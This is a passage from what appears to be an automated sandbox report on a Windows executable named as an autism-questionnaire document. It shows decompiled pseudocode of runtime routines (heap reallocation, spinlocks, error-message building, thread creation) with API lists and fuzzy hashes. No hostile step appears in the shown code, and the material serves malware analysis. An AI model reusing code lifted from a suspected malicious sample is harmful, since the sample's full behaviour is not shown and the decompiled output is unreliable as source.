                                                                                              								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
                                                                                              								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
                                                                                              									L12:
                                                                                              									_t150 = E00403EE8(_t227);
                                                                                              									__eflags = _t150;
                                                                                              									if(_t150 != 0) {
                                                                                              										__eflags = _t227 - 0x40a2c;
                                                                                              										if(_t227 > 0x40a2c) {
                                                                                              											_t93 = _t150 - 0x10;
                                                                                              											__eflags = _t93;
                                                                                              											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                                                              										}
                                                                                              										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                                                              										E0040426C(_t202, _t202, _t227);
                                                                                              									}
                                                                                              								} else {
                                                                                              									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                                                              									_t94 =  *(_t244 + 0x10);
                                                                                              									if(_t218 - _t148 >= _t94) {
                                                                                              										goto L12;
                                                                                              									} else {
                                                                                              										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                                                              										if(_t94 < _t152) {
                                                                                              											_t152 = _t94;
                                                                                              										}
                                                                                              										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
                                                                                              											goto L12;
                                                                                              										} else {
                                                                                              											_t100 = _t202 - 0x10;
                                                                                              											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                                                              											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                                                              											_t150 = _t202;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							return _t150;
                                                                                              						} else {
                                                                                              							__eflags = 0;
                                                                                              							return 0;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t170 = _t166 & 0xfffffff0;
                                                                                              						_push(__edi);
                                                                                              						_t205 = _t170 + __eax;
                                                                                              						_t171 = _t170 - 4;
                                                                                              						_t156 = _t166 & 0x0000000f;
                                                                                              						__eflags = __edx - _t171;
                                                                                              						_push(_t225);
                                                                                              						if(__edx > _t171) {
                                                                                              							_t102 =  *(_t205 - 4);
                                                                                              							__eflags = _t102 & 0x00000001;
                                                                                              							if((_t102 & 0x00000001) == 0) {
                                                                                              								L75:
                                                                                              								asm("adc edi, 0xffffffff");
                                                                                              								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                                                              								_t207 = _t171;
                                                                                              								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                                                              								_t192 = _t176;
                                                                                              								__eflags = _t109;
                                                                                              								if(_t109 == 0) {
                                                                                              									goto L73;
                                                                                              								} else {
                                                                                              									__eflags = _t228 - 0x40a2c;
                                                                                              									if(_t228 > 0x40a2c) {
                                                                                              										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                                                              									}
                                                                                              									_t230 = _t109;
                                                                                              									E00403A74(_t217, _t207, _t109);
                                                                                              									E0040426C(_t217, _t207, _t230);
                                                                                              									return _t230;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t115 = _t102 & 0xfffffff0;
                                                                                              								_t232 = _t171 + _t115;
                                                                                              								__eflags = __edx - _t232;
                                                                                              								if(__edx > _t232) {
                                                                                              									goto L75;
                                                                                              								} else {
                                                                                              									__eflags =  *0x4bb059;
                                                                                              									if(__eflags == 0) {
                                                                                              										L66:
                                                                                              										__eflags = _t115 - 0xb30;
                                                                                              										if(_t115 >= 0xb30) {
                                                                                              											E00403AC0(_t205);
                                                                                              											_t176 = _t176;
                                                                                              											_t171 = _t171;
                                                                                              										}
                                                                                              										asm("adc edi, 0xffffffff");
                                                                                              										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                                                              										_t195 = _t232 + 4 - _t123;
                                                                                              										__eflags = _t195;
                                                                                              										if(_t195 > 0) {
                                                                                              											 *(_t217 + _t232 - 4) = _t195;
                                                                                              											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                                                              											_t233 = _t123;
                                                                                              											__eflags = _t195 - 0xb30;
                                                                                              											if(_t195 >= 0xb30) {
                                                                                              												__eflags = _t123 + _t217;
                                                                                              												E00403B00(_t123 + _t217, _t171, _t195);
                                                                                              											}
                                                                                              										} else {
                                                                                              											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                                                              											_t233 = _t232 + 4;
                                                                                              										}
                                                                                              										_t234 = _t233 | _t156;
                                                                                              										__eflags = _t234;
                                                                                              										 *(_t217 - 4) = _t234;
                                                                                              										 *0x4bbae8 = 0;
                                                                                              										_t109 = _t217;
                                                                                              										L73:
                                                                                              										return _t109;
                                                                                              									} else {
                                                                                              										while(1) {
                                                                                              											asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              											if(__eflags == 0) {
                                                                                              												break;
                                                                                              											}
                                                                                              											asm("pause");
                                                                                              											__eflags =  *0x4bb989;
                                                                                              											if(__eflags != 0) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												Sleep(0);
                                                                                              												_t176 = _t176;
                                                                                              												_t171 = _t171;
                                                                                              												asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              												if(__eflags != 0) {
                                                                                              													Sleep(0xa);
                                                                                              													_t176 = _t176;
                                                                                              													_t171 = _t171;
                                                                                              													continue;
                                                                                              												}
                                                                                              											}
                                                                                              											break;
                                                                                              										}
                                                                                              										_t156 = 0x0000000f &  *(_t217 - 4);
                                                                                              										_t129 =  *(_t205 - 4);
                                                                                              										__eflags = _t129 & 0x00000001;
                                                                                              										if((_t129 & 0x00000001) == 0) {
                                                                                              											L74:
                                                                                              											 *0x4bbae8 = 0;
                                                                                              											goto L75;
                                                                                              										} else {
                                                                                              											_t115 = _t129 & 0xfffffff0;
                                                                                              											_t232 = _t171 + _t115;
                                                                                              											__eflags = _t176 - _t232;
                                                                                              											if(_t176 > _t232) {
                                                                                              												goto L74;
                                                                                              											} else {
                                                                                              												goto L66;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							__eflags = __edx + __edx - _t171;
                                                                                              							if(__edx + __edx < _t171) {
                                                                                              								__eflags = __edx - 0xb2c;
                                                                                              								if(__edx >= 0xb2c) {
                                                                                              									L41:
                                                                                              									_t32 = _t176 + 0xd3; // 0xbff
                                                                                              									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                                                              									_t174 = _t171 + 4 - _t238;
                                                                                              									__eflags =  *0x4bb059;
                                                                                              									if(__eflags != 0) {
                                                                                              										while(1) {
                                                                                              											asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              											if(__eflags == 0) {
                                                                                              												break;
                                                                                              											}
                                                                                              											asm("pause");
                                                                                              											__eflags =  *0x4bb989;
                                                                                              											if(__eflags != 0) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												Sleep(0);
                                                                                              												_t174 = _t174;
                                                                                              												asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              												if(__eflags != 0) {
                                                                                              													Sleep(0xa);
                                                                                              													_t174 = _t174;
                                                                                              													continue;
                                                                                              												}
                                                                                              											}
                                                                                              											break;
                                                                                              										}
                                                                                              										_t156 = 0x0000000f &  *(_t217 - 4);
                                                                                              										__eflags = 0xf;
                                                                                              									}
                                                                                              									 *(_t217 - 4) = _t156 | _t238;
                                                                                              									_t161 = _t174;
                                                                                              									_t196 =  *(_t205 - 4);
                                                                                              									__eflags = _t196 & 0x00000001;
                                                                                              									if((_t196 & 0x00000001) != 0) {
                                                                                              										_t131 = _t205;
                                                                                              										_t197 = _t196 & 0xfffffff0;
                                                                                              										_t161 = _t161 + _t197;
                                                                                              										_t205 = _t205 + _t197;
                                                                                              										__eflags = _t197 - 0xb30;
                                                                                              										if(_t197 >= 0xb30) {
                                                                                              											E00403AC0(_t131);
                                                                                              										}
                                                                                              									} else {
                                                                                              										 *(_t205 - 4) = _t196 | 0x00000008;
                                                                                              									}
                                                                                              									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                                                              									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                                                              									__eflags = _t161 - 0xb30;
                                                                                              									if(_t161 >= 0xb30) {
                                                                                              										E00403B00(_t217 + _t238, _t174, _t161);
                                                                                              									}
                                                                                              									 *0x4bbae8 = 0;
                                                                                              									return _t217;
                                                                                              								} else {
                                                                                              									__eflags = __edx - 0x2cc;
                                                                                              									if(__edx < 0x2cc) {
                                                                                              										_t213 = __edx;
                                                                                              										_t140 = E00403EE8(__edx);
                                                                                              										__eflags = _t140;
                                                                                              										if(_t140 != 0) {
                                                                                              											_t241 = _t140;
                                                                                              											E00403AA4(_t217, _t213, _t140);
                                                                                              											E0040426C(_t217, _t213, _t241);
                                                                                              											_t140 = _t241;
                                                                                              										}
                                                                                              										return _t140;
                                                                                              									} else {
                                                                                              										_t176 = 0xb2c;
                                                                                              										__eflags = _t171 - 0xb2c;
                                                                                              										if(_t171 <= 0xb2c) {
                                                                                              											goto L37;
                                                                                              										} else {
                                                                                              											goto L41;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								L37:
                                                                                              								return _t66;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					__ebx =  *__ecx;
                                                                                              					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                              					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                                                              					__eflags = __ecx - __edx;
                                                                                              					if(__ecx < __edx) {
                                                                                              						__ecx = __ecx + __ecx + 0x20;
                                                                                              						_push(__edi);
                                                                                              						__edi = __edx;
                                                                                              						__eax = 0;
                                                                                              						__ecx = __ecx - __edx;
                                                                                              						asm("adc eax, 0xffffffff");
                                                                                              						__eax = 0 & __ecx;
                                                                                              						__eax = (0 & __ecx) + __edx;
                                                                                              						__eax = E00403EE8((0 & __ecx) + __edx);
                                                                                              						__eflags = __eax;
                                                                                              						if(__eax != 0) {
                                                                                              							__eflags = __edi - 0x40a2c;
                                                                                              							if(__edi > 0x40a2c) {
                                                                                              								 *(__eax - 8) = __edi;
                                                                                              							}
                                                                                              							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                                                              							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                                                              							__edx = __eax;
                                                                                              							__edi = __eax;
                                                                                              							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
                                                                                              							__eax = __edi;
                                                                                              						}
                                                                                              						_pop(__edi);
                                                                                              						_pop(__esi);
                                                                                              						_pop(__ebx);
                                                                                              						return __eax;
                                                                                              					} else {
                                                                                              						__ebx = 0x40 + __edx * 4;
                                                                                              						__eflags = 0x40 + __edx * 4 - __ecx;
                                                                                              						if(0x40 + __edx * 4 < __ecx) {
                                                                                              							__ebx = __edx;
                                                                                              							__eax = __edx;
                                                                                              							__eax = E00403EE8(__edx);
                                                                                              							__eflags = __eax;
                                                                                              							if(__eax != 0) {
                                                                                              								__ecx = __ebx;
                                                                                              								__edx = __eax;
                                                                                              								__ebx = __eax;
                                                                                              								__esi = E0040426C(__esi, __edi, __ebp);
                                                                                              								__eax = __ebx;
                                                                                              							}
                                                                                              							_pop(__esi);
                                                                                              							_pop(__ebx);
                                                                                              							return __eax;
                                                                                              						} else {
                                                                                              							_pop(__esi);
                                                                                              							_pop(__ebx);
                                                                                              							return __eax;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}












































                                                                                              0x004044e2
                                                                                              0x004044e5
                                                                                              0x004044e7
                                                                                              0x004044f0
                                                                                              0x004044f5
                                                                                              0x004044f5
                                                                                              0x004044f7
                                                                                              0x004044f8
                                                                                              0x004044f9
                                                                                              0x004044fa
                                                                                              0x00404481
                                                                                              0x00404481
                                                                                              0x00404488
                                                                                              0x0040448a
                                                                                              0x00404490
                                                                                              0x00404492
                                                                                              0x00404494
                                                                                              0x00404499
                                                                                              0x0040449b
                                                                                              0x0040449d
                                                                                              0x0040449f
                                                                                              0x004044a1
                                                                                              0x004044ac
                                                                                              0x004044b1
                                                                                              0x004044b1
                                                                                              0x004044b3
                                                                                              0x004044b4
                                                                                              0x004044b5
                                                                                              0x0040448c
                                                                                              0x0040448c
                                                                                              0x0040448d
                                                                                              0x0040448e
                                                                                              0x0040448e
                                                                                              0x0040448a
                                                                                              0x0040447f

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                              • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                                                              • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                              • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				char _v8;
                                                                                              				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                              				short _v558;
                                                                                              				char _v564;
                                                                                              				intOrPtr _v568;
                                                                                              				char _v572;
                                                                                              				char _v576;
                                                                                              				char _v580;
                                                                                              				intOrPtr _v584;
                                                                                              				char _v588;
                                                                                              				void* _v592;
                                                                                              				char _v596;
                                                                                              				char _v600;
                                                                                              				char _v604;
                                                                                              				char _v608;
                                                                                              				intOrPtr _v612;
                                                                                              				char _v616;
                                                                                              				char _v620;
                                                                                              				char _v624;
                                                                                              				void* _v628;
                                                                                              				char _v632;
                                                                                              				void* _t64;
                                                                                              				intOrPtr _t65;
                                                                                              				long _t76;
                                                                                              				intOrPtr _t82;
                                                                                              				intOrPtr _t103;
                                                                                              				intOrPtr _t107;
                                                                                              				intOrPtr _t110;
                                                                                              				intOrPtr _t112;
                                                                                              				intOrPtr _t115;
                                                                                              				intOrPtr _t127;
                                                                                              				void* _t136;
                                                                                              				intOrPtr _t138;
                                                                                              				void* _t141;
                                                                                              				void* _t143;
                                                                                              
                                                                                              				_t136 = __edi;
                                                                                              				_t140 = _t141;
                                                                                              				_v632 = 0;
                                                                                              				_v596 = 0;
                                                                                              				_v604 = 0;
                                                                                              				_v600 = 0;
                                                                                              				_v8 = 0;
                                                                                              				_push(_t141);
                                                                                              				_push(0x41f9a6);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t141 + 0xfffffd8c;
                                                                                              				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
                                                                                              				_t143 = _t64;
                                                                                              				if(_t143 < 0) {
                                                                                              					_t65 =  *0x4ba798; // 0x40e730
                                                                                              					E0040C9F0(_t65,  &_v8, _t140);
                                                                                              				} else {
                                                                                              					if(_t143 == 0) {
                                                                                              						_t107 =  *0x4ba670; // 0x40e738
                                                                                              						E0040C9F0(_t107,  &_v8, _t140);
                                                                                              					} else {
                                                                                              						if(_t64 == 7) {
                                                                                              							_t110 =  *0x4ba4d0; // 0x40e740
                                                                                              							E0040C9F0(_t110,  &_v8, _t140);
                                                                                              						} else {
                                                                                              							_t112 =  *0x4ba5c8; // 0x40e748
                                                                                              							E0040C9F0(_t112,  &_v8, _t140);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
                                                                                              				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
                                                                                              				_t138 = _v36.State;
                                                                                              				if(_t138 == 0x1000 || _t138 == 0x10000) {
                                                                                              					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
                                                                                              					_t147 = _t76;
                                                                                              					if(_t76 == 0) {
                                                                                              						goto L12;
                                                                                              					} else {
                                                                                              						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                                                              						_v588 = 5;
                                                                                              						E0040858C( &_v600, 0x105,  &_v558);
                                                                                              						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
                                                                                              						_v584 = _v596;
                                                                                              						_v580 = 0x11;
                                                                                              						_v576 = _v8;
                                                                                              						_v572 = 0x11;
                                                                                              						_v568 = _t115;
                                                                                              						_v564 = 5;
                                                                                              						_push( &_v592);
                                                                                              						_t103 =  *0x4ba6e0; // 0x40e810
                                                                                              						E0040C9F0(_t103,  &_v604, _t140, 3);
                                                                                              						E0041F2A0(_t115, _v604, 1, _t136, _t138);
                                                                                              					}
                                                                                              				} else {
                                                                                              					L12:
                                                                                              					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                                                              					_v624 = 5;
                                                                                              					_v620 = _v8;
                                                                                              					_v616 = 0x11;
                                                                                              					_v612 = _t115;
                                                                                              					_v608 = 5;
                                                                                              					_push( &_v628);
                                                                                              					_t82 =  *0x4ba67c; // 0x40e6d8
                                                                                              					E0040C9F0(_t82,  &_v632, _t140, 2);
                                                                                              					E0041F2A0(_t115, _v632, 1, _t136, _t138);
                                                                                              				}
                                                                                              				_pop(_t127);
                                                                                              				 *[fs:eax] = _t127;
                                                                                              				_push(0x41f9ad);
                                                                                              				E00407A20( &_v632);
                                                                                              				E00407A80( &_v604, 3);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}







































                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                                                • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                              • String ID: 0@$8@$@@$H@
                                                                                              • API String ID: 902310565-4161625419
                                                                                              • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                              • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                                              • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                              • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E00406688(signed char* __eax, void* __edx, void* __eflags) {
                                                                                              				void* _t49;
                                                                                              				signed char _t56;
                                                                                              				intOrPtr _t57;
                                                                                              				signed char _t59;
                                                                                              				void* _t70;
                                                                                              				signed char* _t71;
                                                                                              				intOrPtr _t72;
                                                                                              				signed char* _t73;
                                                                                              
                                                                                              				_t70 = __edx;
                                                                                              				_t71 = __eax;
                                                                                              				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                                                              				while(1) {
                                                                                              					L1:
                                                                                              					 *_t73 = E00406B30(_t71);
                                                                                              					if( *_t73 != 0 || _t70 == 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t73[1] = 0;
                                                                                              					if(_t72 <= 0) {
                                                                                              						while(1) {
                                                                                              							L17:
                                                                                              							_t56 =  *_t71;
                                                                                              							if(_t56 == 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							asm("lock cmpxchg [esi], edx");
                                                                                              							if(_t56 != _t56) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								goto L19;
                                                                                              							}
                                                                                              							do {
                                                                                              								L19:
                                                                                              								_t73[4] = GetTickCount();
                                                                                              								E0040688C(_t71);
                                                                                              								_t57 =  *0x4bb8f8; // 0x4b9284
                                                                                              								 *((intOrPtr*)(_t57 + 0x10))();
                                                                                              								 *_t73 = 0 == 0;
                                                                                              								if(_t70 != 0xffffffff) {
                                                                                              									_t73[8] = GetTickCount();
                                                                                              									if(_t70 <= _t73[8] - _t73[4]) {
                                                                                              										_t70 = 0;
                                                                                              									} else {
                                                                                              										_t70 = _t70 - _t73[8] - _t73[4];
                                                                                              									}
                                                                                              								}
                                                                                              								if( *_t73 == 0) {
                                                                                              									do {
                                                                                              										asm("lock cmpxchg [esi], edx");
                                                                                              									} while ( *_t71 !=  *_t71);
                                                                                              									_t73[1] = 1;
                                                                                              								} else {
                                                                                              									while(1) {
                                                                                              										_t59 =  *_t71;
                                                                                              										if((_t59 & 0x00000001) != 0) {
                                                                                              											goto L29;
                                                                                              										}
                                                                                              										asm("lock cmpxchg [esi], edx");
                                                                                              										if(_t59 != _t59) {
                                                                                              											continue;
                                                                                              										}
                                                                                              										_t73[1] = 1;
                                                                                              										goto L29;
                                                                                              									}
                                                                                              								}
                                                                                              								L29:
                                                                                              							} while (_t73[1] == 0);
                                                                                              							if( *_t73 != 0) {
                                                                                              								_t71[8] = GetCurrentThreadId();
                                                                                              								_t71[4] = 1;
                                                                                              							}
                                                                                              							goto L32;
                                                                                              						}
                                                                                              						continue;
                                                                                              					}
                                                                                              					_t73[4] = GetTickCount();
                                                                                              					_t73[0xc] = 0;
                                                                                              					if(_t72 <= 0) {
                                                                                              						L13:
                                                                                              						if(_t70 == 0xffffffff) {
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						_t73[8] = GetTickCount();
                                                                                              						_t49 = _t73[8] - _t73[4];
                                                                                              						if(_t70 > _t49) {
                                                                                              							_t70 = _t70 - _t49;
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						 *_t73 = 0;
                                                                                              						break;
                                                                                              					}
                                                                                              					L5:
                                                                                              					L5:
                                                                                              					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						 *_t73 = 0;
                                                                                              					}
                                                                                              					break;
                                                                                              					L8:
                                                                                              					if( *_t71 > 1) {
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					if( *_t71 != 0) {
                                                                                              						L12:
                                                                                              						E00406368( &(_t73[0xc]));
                                                                                              						_t72 = _t72 - 1;
                                                                                              						if(_t72 > 0) {
                                                                                              							goto L5;
                                                                                              						}
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					asm("lock cmpxchg [esi], edx");
                                                                                              					if(0 != 0) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					_t71[8] = GetCurrentThreadId();
                                                                                              					_t71[4] = 1;
                                                                                              					 *_t73 = 1;
                                                                                              					break;
                                                                                              				}
                                                                                              				L32:
                                                                                              				return  *_t73 & 0x000000ff;
                                                                                              			}












                                                                                              APIs
                                                                                                • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                                              • GetTickCount.KERNEL32 ref: 004066BF
                                                                                              • GetTickCount.KERNEL32 ref: 004066D7
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                                              • GetTickCount.KERNEL32 ref: 00406731
                                                                                              • GetTickCount.KERNEL32 ref: 00406768
                                                                                              • GetTickCount.KERNEL32 ref: 00406792
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CurrentThread
                                                                                              • String ID:
                                                                                              • API String ID: 3968769311-0
                                                                                              • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                              • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                                              • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                                              • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				char _v5;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				char _v20;
                                                                                              				void* _t23;
                                                                                              				char _t29;
                                                                                              				void* _t50;
                                                                                              				intOrPtr _t55;
                                                                                              				char _t57;
                                                                                              				intOrPtr _t59;
                                                                                              				void* _t64;
                                                                                              				void* _t66;
                                                                                              				void* _t68;
                                                                                              				void* _t69;
                                                                                              				intOrPtr _t70;
                                                                                              
                                                                                              				_t64 = __edi;
                                                                                              				_t57 = __edx;
                                                                                              				_t50 = __ecx;
                                                                                              				_t68 = _t69;
                                                                                              				_t70 = _t69 + 0xfffffff0;
                                                                                              				_v20 = 0;
                                                                                              				if(__edx != 0) {
                                                                                              					_t70 = _t70 + 0xfffffff0;
                                                                                              					_t23 = E004062B0(_t23, _t68);
                                                                                              				}
                                                                                              				_t49 = _t50;
                                                                                              				_v5 = _t57;
                                                                                              				_t66 = _t23;
                                                                                              				_push(_t68);
                                                                                              				_push(0x4972a5);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t70;
                                                                                              				E00405CB8(0);
                                                                                              				_t3 = _t66 + 0x2c; // 0x266461
                                                                                              				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
                                                                                              				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
                                                                                              					_t29 = 0;
                                                                                              				} else {
                                                                                              					_t29 = 1;
                                                                                              				}
                                                                                              				 *((char*)(_t66 + 0xd)) = _t29;
                                                                                              				if( *(_t66 + 0x2c) != 0) {
                                                                                              					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
                                                                                              					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
                                                                                              				} else {
                                                                                              					if(_a4 == 0) {
                                                                                              						_t12 = _t66 + 4; // 0x495548
                                                                                              						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
                                                                                              					} else {
                                                                                              						_t9 = _t66 + 4; // 0x495548
                                                                                              						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
                                                                                              					}
                                                                                              					if( *((intOrPtr*)(_t66 + 8)) == 0) {
                                                                                              						E0041DFB0(GetLastError(), _t49, 0, _t66);
                                                                                              						_v16 = _v20;
                                                                                              						_v12 = 0x11;
                                                                                              						_t55 =  *0x4ba740; // 0x40ea6c
                                                                                              						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
                                                                                              						E0040711C();
                                                                                              					}
                                                                                              				}
                                                                                              				_pop(_t59);
                                                                                              				 *[fs:eax] = _t59;
                                                                                              				_push(0x4972ac);
                                                                                              				return E00407A20( &_v20);
                                                                                              			}

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                                                • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                                              • GetCurrentThread.KERNEL32 ref: 0049727F
